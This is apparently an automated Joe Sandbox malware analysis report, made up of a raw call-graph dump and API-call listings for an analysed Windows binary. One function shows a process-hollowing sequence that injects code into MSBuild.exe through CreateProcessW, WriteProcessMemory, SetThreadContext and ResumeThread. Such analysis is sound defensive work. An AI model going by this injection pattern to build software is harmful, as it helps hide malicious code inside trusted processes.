92ad80 __dosmaperr 14 API calls 15948->15951 15952 92ad80 __dosmaperr 14 API calls 15949->15952 15950->15957 15951->15957 15952->15957 15953->15957 15987 93690a 15953->15987 15974 936666 15954->15974 15957->15943 16005 934f1c LeaveCriticalSection 15958->16005 15960 93625b 15960->15893 15962 934007 _Fputc 15961->15962 15993 934194 15962->15993 15964 93401c _Fputc 15964->15922 15966 9389a1 15965->15966 15968 9389ae 15965->15968 15967 92ad6d __dosmaperr 14 API calls 15966->15967 15969 9389a6 15967->15969 15970 9389ba 15968->15970 15971 92ad6d __dosmaperr 14 API calls 15968->15971 15969->15925 15970->15925 15972 9389db 15971->15972 15973 92b458 __strnicoll 29 API calls 15972->15973 15973->15969 15999 9367bd 15974->15999 15976 92e57f __strnicoll MultiByteToWideChar 15977 93677a 15976->15977 15981 936783 GetLastError 15977->15981 15982 9366ae 15977->15982 15978 936708 15985 933ff3 __fread_nolock 31 API calls 15978->15985 15986 9366c2 15978->15986 15979 9366f8 15983 92ad6d __dosmaperr 14 API calls 15979->15983 15984 92ad93 __dosmaperr 14 API calls 15981->15984 15982->15957 15983->15982 15984->15982 15985->15986 15986->15976 15988 936944 15987->15988 15989 9369d5 15988->15989 15990 9369da ReadFile 15988->15990 15989->15957 15990->15989 15991 9369f7 15990->15991 15991->15989 15992 933ff3 __fread_nolock 31 API calls 15991->15992 15992->15989 15994 934cb0 __fread_nolock 29 API calls 15993->15994 15995 9341a6 15994->15995 15996 9341c2 SetFilePointerEx 15995->15996 15998 9341ae __fread_nolock 15995->15998 15997 9341da GetLastError 15996->15997 15996->15998 15997->15998 15998->15964 16000 9367f1 15999->16000 16001 936862 ReadFile 16000->16001 16002 93667d 16000->16002 16001->16002 16003 93687b 16001->16003 16002->15978 16002->15979 16002->15982 16002->15986 16003->16002 16004 933ff3 __fread_nolock 31 API calls 16003->16004 16004->16002 16005->15960 16006->15837 16008 924793 16007->16008 16009 924703 16007->16009 16010 921860 std::ios_base::_Init 31 API calls 16008->16010 16014 9247f6 16009->16014 16011 924798 16010->16011 16013 924720 _Yarn _Deallocate 16013->15806 16015 924802 16014->16015 16016 924800 16014->16016 16017 924811 16015->16017 16018 92480a 16015->16018 16016->16013 16020 922952 codecvt 16 API calls 16017->16020 16019 92186a std::ios_base::_Init 31 API calls 16018->16019 16021 92480f 16019->16021 16020->16021 16021->16013 16022->15818 16024 92cfd2 16023->16024 16026 92d042 16023->16026 16025 930efc __fread_nolock 29 API calls 16024->16025 16029 92cfd8 16025->16029 16027 92cf87 16026->16027 16028 937d00 __fread_nolock 14 API calls 16026->16028 16034 92cfb2 16027->16034 16028->16027 16029->16026 16030 92d02a 16029->16030 16031 92ad6d __dosmaperr 14 API calls 16030->16031 16032 92d02f 16031->16032 16033 92b458 __strnicoll 29 API calls 16032->16033 16033->16027 16037 928773 LeaveCriticalSection 16034->16037 16036 92cfb8 16036->15821 16037->16036 17289 92430a 17290 924342 17289->17290 17291 924313 17289->17291 17291->17290 17294 92bb66 17291->17294 17293 924335 17295 92bb78 17294->17295 17298 92bb81 ___scrt_uninitialize_crt 17294->17298 17296 92bce4 ___scrt_uninitialize_crt 68 API calls 17295->17296 17297 92bb7e 17296->17297 17297->17293 17299 92bb90 17298->17299 17302 92be69 17298->17302 17299->17293 17303 92be75 ___scrt_is_nonwritable_in_current_image 17302->17303 17310 92875f EnterCriticalSection 17303->17310 17305 92be83 17306 92bbc2 ___scrt_uninitialize_crt 68 API calls 17305->17306 17307 92be94 17306->17307 17311 92bebd 17307->17311 17310->17305 17314 928773 LeaveCriticalSection 17311->17314 17313 92bbb7 17313->17293 17314->17313 16503 92422c 16504 92424e 16503->16504 16508 924263 16503->16508 16509 9243df 16504->16509 16512 9243f9 16509->16512 16514 924448 16509->16514 16510 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16511 924253 16510->16511 16511->16508 16515 92c53d 16511->16515 16513 92c578 69 API calls 16512->16513 16512->16514 16513->16514 16514->16510 16516 92c548 16515->16516 16517 92c55d 16515->16517 16518 92ad6d __dosmaperr 14 API calls 16516->16518 16517->16516 16519 92c564 16517->16519 16520 92c54d 16518->16520 16525 92ae1d 16519->16525 16523 92b458 __strnicoll 29 API calls 16520->16523 16522 92c573 16522->16508 16524 92c558 16523->16524 16524->16508 16526 92ae30 _Fputc 16525->16526 16529 92b096 16526->16529 16528 92ae45 _Fputc 16528->16522 16531 92b0a2 ___scrt_is_nonwritable_in_current_image 16529->16531 16530 92b0a8 16532 92b601 _Fputc 29 API calls 16530->16532 16531->16530 16533 92b0eb 16531->16533 16534 92b0c3 16532->16534 16540 92875f EnterCriticalSection 16533->16540 16534->16528 16536 92b0f7 16541 92afaa 16536->16541 16538 92b10d 16552 92b136 16538->16552 16540->16536 16542 92afd0 16541->16542 16543 92afbd 16541->16543 16555 92aed1 16542->16555 16543->16538 16545 92aff3 16548 92b00e 16545->16548 16551 92b081 16545->16551 16559 93424d 16545->16559 16547 92bc27 ___scrt_uninitialize_crt 64 API calls 16549 92b021 16547->16549 16548->16547 16573 934033 16549->16573 16551->16538 16614 928773 LeaveCriticalSection 16552->16614 16554 92b13e 16554->16534 16556 92af3a 16555->16556 16557 92aee2 16555->16557 16556->16545 16557->16556 16558 933ff3 __fread_nolock 31 API calls 16557->16558 16558->16556 16560 93461f 16559->16560 16561 934656 16560->16561 16562 93462e 16560->16562 16563 930efc __fread_nolock 29 API calls 16561->16563 16564 92b601 _Fputc 29 API calls 16562->16564 16565 93465f 16563->16565 16571 934649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16564->16571 16576 934051 16565->16576 16568 934709 16579 9342a9 16568->16579 16570 934720 16570->16571 16591 934454 16570->16591 16571->16548 16574 934194 __fread_nolock 31 API calls 16573->16574 16575 93404c 16574->16575 16575->16551 16598 93406f 16576->16598 16580 9342b8 _Fputc 16579->16580 16581 930efc __fread_nolock 29 API calls 16580->16581 16582 9342d4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16581->16582 16585 934051 33 API calls 16582->16585 16590 9342e0 16582->16590 16583 9229c6 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16584 934452 16583->16584 16584->16571 16586 934334 16585->16586 16587 934366 ReadFile 16586->16587 16586->16590 16588 93438d 16587->16588 16587->16590 16589 934051 33 API calls 16588->16589 16589->16590 16590->16583 16592 930efc __fread_nolock 29 API calls 16591->16592 16593 934467 16592->16593 16594 934051 33 API calls 16593->16594 16597 9344b1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 16593->16597 16595 93450e 16594->16595 16596 934051 33 API calls 16595->16596 16595->16597 16596->16597 16597->16571 16599 93407b ___scrt_is_nonwritable_in_current_image 16598->16599 16600 9340be 16599->16600 16601 934104 16599->16601 16608 93406a 16599->16608 16602 92b601 _Fputc 29 API calls 16600->16602 16609 934ef9 EnterCriticalSection 16601->16609 16602->16608 16604 93410a 16605 93412b 16604->16605 16606 934194 __fread_nolock 31 API calls 16604->16606 16610 93418c 16605->16610 16606->16605 16608->16568 16608->16570 16608->16571 16609->16604 16613 934f1c LeaveCriticalSection 16610->16613 16612 934192 16612->16608 16613->16612 16614->16554 16623 92884f 16624 92bbb9 ___scrt_uninitialize_crt 68 API calls 16623->16624 16625 928857 16624->16625 16633 930cde 16625->16633 16627 92885c 16628 930d89 14 API calls 16627->16628 16629 92886b DeleteCriticalSection 16628->16629 16629->16627 16630 928886 16629->16630 16631 92e4f7 ___free_lconv_mon 14 API calls 16630->16631 16632 928891 16631->16632 16634 930cea ___scrt_is_nonwritable_in_current_image 16633->16634 16643 92b750 EnterCriticalSection 16634->16643 16636 930cf5 16637 930d61 16636->16637 16639 930d35 DeleteCriticalSection 16636->16639 16644 92ba11 16636->16644 16648 930d80 16637->16648 16642 92e4f7 ___free_lconv_mon 14 API calls 16639->16642 16642->16636 16643->16636 16645 92ba24 _Fputc 16644->16645 16651 92bacf 16645->16651 16647 92ba30 _Fputc 16647->16636 16723 92b767 LeaveCriticalSection 16648->16723 16650 930d6d 16650->16627 16652 92badb ___scrt_is_nonwritable_in_current_image 16651->16652 16653 92bae5 16652->16653 16654 92bb08 16652->16654 16656 92b601 _Fputc 29 API calls 16653->16656 16655 92bb00 16654->16655 16662 92875f EnterCriticalSection 16654->16662 16655->16647 16656->16655 16658 92bb26 16663 92ba41 16658->16663 16660 92bb33 16677 92bb5e 16660->16677 16662->16658 16664 92ba71 16663->16664 16665 92ba4e 16663->16665 16667 92bc27 ___scrt_uninitialize_crt 64 API calls 16664->16667 16675 92ba69 16664->16675 16666 92b601 _Fputc 29 API calls 16665->16666 16666->16675 16668 92ba89 16667->16668 16669 930d89 14 API calls 16668->16669 16670 92ba91 16669->16670 16671 930efc __fread_nolock 29 API calls 16670->16671 16672 92ba9d 16671->16672 16680 934ff5 16672->16680 16675->16660 16676 92e4f7 ___free_lconv_mon 14 API calls 16676->16675 16722 928773 LeaveCriticalSection 16677->16722 16679 92bb64 16679->16655 16681 93501e 16680->16681 16686 92baa4 16680->16686 16682 93506d 16681->16682 16684 935045 16681->16684 16683 92b601 _Fputc 29 API calls 16682->16683 16683->16686 16687 935098 16684->16687 16686->16675 16686->16676 16688 9350a4 ___scrt_is_nonwritable_in_current_image 16687->16688 16695 934ef9 EnterCriticalSection 16688->16695 16690 9350b2 16691 9350e3 16690->16691 16696 934f55 16690->16696 16709 93511d 16691->16709 16695->16690 16697 934cb0 __fread_nolock 29 API calls 16696->16697 16698 934f65 16697->16698 16699 934f6b 16698->16699 16700 934f9d 16698->16700 16702 934cb0 __fread_nolock 29 API calls 16698->16702 16712 934d1a 16699->16712 16700->16699 16703 934cb0 __fread_nolock 29 API calls 16700->16703 16704 934f94 16702->16704 16705 934fa9 CloseHandle 16703->16705 16706 934cb0 __fread_nolock 29 API calls 16704->16706 16705->16699 16707 934fb5 GetLastError 16705->16707 16706->16700 16707->16699 16708 934fc3 __fread_nolock 16708->16691 16721 934f1c LeaveCriticalSection 16709->16721 16711 935106 16711->16686 16713 934d90 16712->16713 16714 934d29 16712->16714 16715 92ad6d __dosmaperr 14 API calls 16713->16715 16714->16713 16720 934d53 16714->16720 16716 934d95 16715->16716 16717 92ad80 __dosmaperr 14 API calls 16716->16717 16718 934d80 16717->16718 16718->16708 16719 934d7a SetStdHandle 16719->16718 16720->16718 16720->16719 16721->16711 16722->16679 16723->16650 17904 92416b 17905 92417f 17904->17905 17906 9241da 17905->17906 17907 9243df 69 API calls 17905->17907 17908 9241aa 17907->17908 17908->17906 17909 9241c7 17908->17909 17910 92ae1d 67 API calls 17908->17910 17909->17906 17912 92c01e 17909->17912 17910->17909 17913 92c029 17912->17913 17914 92c03e 17912->17914 17917 92ad6d __dosmaperr 14 API calls 17913->17917 17915 92c046 17914->17915 17916 92c05b 17914->17916 17918 92ad6d __dosmaperr 14 API calls 17915->17918 17926 934217 17916->17926 17920 92c02e 17917->17920 17922 92c04b 17918->17922 17921 92b458 __strnicoll 29 API calls 17920->17921 17924 92c039 17921->17924 17925 92b458 __strnicoll 29 API calls 17922->17925 17923 92c056 17923->17906 17924->17906 17925->17923 17927 93422b _Fputc 17926->17927 17930 9347c0 17927->17930 17929 934237 _Fputc 17929->17923 17931 9347cc ___scrt_is_nonwritable_in_current_image 17930->17931 17932 9347d3 17931->17932 17933 9347f6 17931->17933 17934 92b601 _Fputc 29 API calls 17932->17934 17941 92875f EnterCriticalSection 17933->17941 17936 9347ec 17934->17936 17936->17929 17937 934804 17942 93461f 17937->17942 17939 934813 17955 934845 17939->17955 17941->17937 17943 934656 17942->17943 17944 93462e 17942->17944 17945 930efc __fread_nolock 29 API calls 17943->17945 17946 92b601 _Fputc 29 API calls 17944->17946 17947 93465f 17945->17947 17948 934649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17946->17948 17949 934051 33 API calls 17947->17949 17948->17939 17950 93467d 17949->17950 17950->17948 17951 934720 17950->17951 17952 934709 17950->17952 17951->17948 17954 934454 33 API calls 17951->17954 17953 9342a9 34 API calls 17952->17953 17953->17948 17954->17948 17958 928773 LeaveCriticalSection 17955->17958 17957 93484d 17957->17936 17958->17957

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00945110,00945100), ref: 00945334
                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00945347
                                                                                                                                                                                            • Wow64GetThreadContext.KERNEL32(000000E0,00000000), ref: 00945365
                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(000000D0,?,00945154,00000004,00000000), ref: 00945389
                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(000000D0,?,?,00003000,00000040), ref: 009453B4
                                                                                                                                                                                            • TerminateProcess.KERNELBASE(000000D0,00000000), ref: 009453D3
                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(000000D0,00000000,?,?,00000000,?), ref: 0094540C
                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(000000D0,00400000,?,?,00000000,?,00000028), ref: 00945457
                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(000000D0,?,?,00000004,00000000), ref: 00945495
                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(000000E0,00880000), ref: 009454D1
                                                                                                                                                                                            • ResumeThread.KERNELBASE(000000E0), ref: 009454E0
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                            • API String ID: 2440066154-3857624555
                                                                                                                                                                                            • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                            • Instruction ID: 52851a5134faa04feb1aa533d4a029f2076b26960463db7bf17ba0bf86b866a1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DB1F97260064AAFDB60CFA8CC80FDA73A5FF88714F158514EA08AB341D774FA51CB94

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00921098: _strlen.LIBCMT ref: 009210F9
                                                                                                                                                                                            • CreateFileA.KERNELBASE ref: 00921675
                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00921685
                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 009216AB
                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 009216BA
                                                                                                                                                                                            • _strlen.LIBCMT ref: 00921705
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00921805
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2911764282-0
                                                                                                                                                                                            • Opcode ID: ef6ec7b7b76acf09282e5ebacfaf9a85655b84a2a5a34c5606db226ff2d1a4cd
                                                                                                                                                                                            • Instruction ID: d259d71634b976b736783cd680c346b4ee3e66a8a4e6b2aebd759af3e0aa2ece
                                                                                                                                                                                            • Opcode Fuzzy Hash: ef6ec7b7b76acf09282e5ebacfaf9a85655b84a2a5a34c5606db226ff2d1a4cd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7751F0B59083519BC700EF24EC84B2EBBE9FFE9304F154A2DF48997251E73499948B52

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 79 92123b-921261 80 921263-92127c 79->80 80->80 81 92127e-921280 80->81 82 921282-9212ac 81->82 82->82 83 9212ae-9212b6 82->83 84 921355-92136d call 9229c6 83->84 85 9212bc-9212c0 83->85 86 9212c2-9212df 85->86 90 9212e1-9212eb call 92136e 86->90 91 9212fc-92134f 86->91 93 9212f0-9212f9 call 921533 90->93 91->84 91->86 93->91
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 009212C7
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                            • String ID: [+]$Fju
                                                                                                                                                                                            • API String ID: 6842923-117220630
                                                                                                                                                                                            • Opcode ID: 2a9e55c548933d6f45b8950f2d44555470c28d0358fac2ed3b5da837e715090e
                                                                                                                                                                                            • Instruction ID: 1b2dcae93dd94c63b829bd01fb980b0362fe1cb9cba6df4039d22f664e3cc5b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a9e55c548933d6f45b8950f2d44555470c28d0358fac2ed3b5da837e715090e
                                                                                                                                                                                            • Instruction Fuzzy Hash: AB31273150C3D04BD726AB3478997EBBBD4ABFE318F18097DD8D987247C1605445C762

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00921098: _strlen.LIBCMT ref: 009210F9
                                                                                                                                                                                            • FreeConsole.KERNELBASE ref: 0092158B
                                                                                                                                                                                              • Part of subcall function 0092123B: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 009212C7
                                                                                                                                                                                            • VirtualProtect.KERNELBASE(00945011,00000549,00000040,?), ref: 009215D7
                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 0092160E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleDispatcherExceptionExitFreeProcessProtectUserVirtual_strlen
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2898289550-0
                                                                                                                                                                                            • Opcode ID: 0b819f056b137603a8b5b2a8025b65289253549b1ee1dc58c1d377895b4e62a4
                                                                                                                                                                                            • Instruction ID: 3ca3342c82c23c102e4857a66b1c56a7f97510b9d521dc73c905bbec6fe0947c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b819f056b137603a8b5b2a8025b65289253549b1ee1dc58c1d377895b4e62a4
                                                                                                                                                                                            • Instruction Fuzzy Hash: A3110AB1E00218ABEB00ABA4EC42FBF7768EFD5714F404035F508B7292E5755D1147E1

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 110 935283-9352a5 111 9352ab-9352ad 110->111 112 935498 110->112 113 9352d9-9352fc 111->113 114 9352af-9352ce call 92b601 111->114 115 93549a-93549e 112->115 117 935302-935308 113->117 118 9352fe-935300 113->118 121 9352d1-9352d4 114->121 117->114 120 93530a-93531b 117->120 118->117 118->120 122 93532e-93533e call 9355b0 120->122 123 93531d-93532b call 934033 120->123 121->115 128 935340-935346 122->128 129 935387-935399 122->129 123->122 130 935348-93534b 128->130 131 93536f-935385 call 93562d 128->131 132 9353f0-935410 WriteFile 129->132 133 93539b-9353a1 129->133 134 935356-935365 call 9359f4 130->134 135 93534d-935350 130->135 153 935368-93536a 131->153 137 935412-935418 GetLastError 132->137 138 93541b 132->138 139 9353a3-9353a6 133->139 140 9353dc-9353e9 call 935a5c 133->140 134->153 135->134 143 935430-935433 135->143 137->138 147 93541e-935429 138->147 141 9353c8-9353da call 935c20 139->141 142 9353a8-9353ab 139->142 152 9353ee 140->152 160 9353c3-9353c6 141->160 148 935436-935438 142->148 149 9353b1-9353be call 935b37 142->149 143->148 154 935493-935496 147->154 155 93542b-93542e 147->155 156 935466-935472 148->156 157 93543a-93543f 148->157 149->160 152->160 153->147 154->115 155->143 163 935474-93547a 156->163 164 93547c-93548e 156->164 161 935441-935453 157->161 162 935458-935461 call 92adf9 157->162 160->153 161->121 162->121 163->112 163->164 164->121
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 0093562D: GetConsoleOutputCP.KERNEL32(1206BC9F,00000000,00000000,?), ref: 00935690
                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0092BBF3,?), ref: 00935408
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0092BBF3,?,0092BE37,00000000,?,00000000,0092BE37,?,?,?,00944628,0000002C,0092BD23,?), ref: 00935412
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_920000_d2cb36d600.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2915228174-0
                                                                                                                                                                                            • Opcode ID: b57a471e4aeea7f79598fc57647ab955e6e6d0bd351ef9d7b71a73b6cb8bf258
                                                                                                                                                                                            • Instruction ID: 059ef46188177dd524ccacbb12a1e4f94b61eee4695c8bb305156791a5096d8f
                                                                                                                                                                                            • Opcode Fuzzy Hash: b57a471e4aeea7f79598fc57647ab955e6e6d0bd351ef9d7b71a73b6cb8bf258
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9061D1B1C04619AFDF15CFA8C884EEEBBB9AF4D304F160599E900A7216D375DA41CFA0

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 167 935a5c-935ab1 call 9256e0 170 935ab3 167->170 171 935b26-935b36 call 9229c6 167->171 173 935ab9 170->173 175 935abf-935ac1 173->175 176 935ac3-935ac8 175->176 177 935adb-935b00 WriteFile 175->177 178 935ad1-935ad9 176->178 179 935aca-935ad0 176->179 180 935b02-935b0d 177->180 181 935b1e-935b24 GetLastError 177->181 178->175 178->177 179->178 180->171 182 935b0f-935b1a 180->182 181->171 182->173 183 935b1c 182->183 183->171
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,009353EE,00000000,0092BE37,?,00000000,?,00000000), ref: 00935AF8
                                                                                                                                                                                            • GetLastError.KERNEL32(?,009353EE,00000000,0092BE37,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,0092BBF3), ref: 00935B1E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.2144352860.0000000000921000.00000020.00000001.01000000.00000009.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                            • Associated: 00000008.00000002.2144316982.0000000000920000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144385630.000000000093C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144420684.0000000000945000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144443576.0000000000946000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144467518.0000000000948000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144505461.000000000094A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000008.00000002.2144540356.000000000094D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
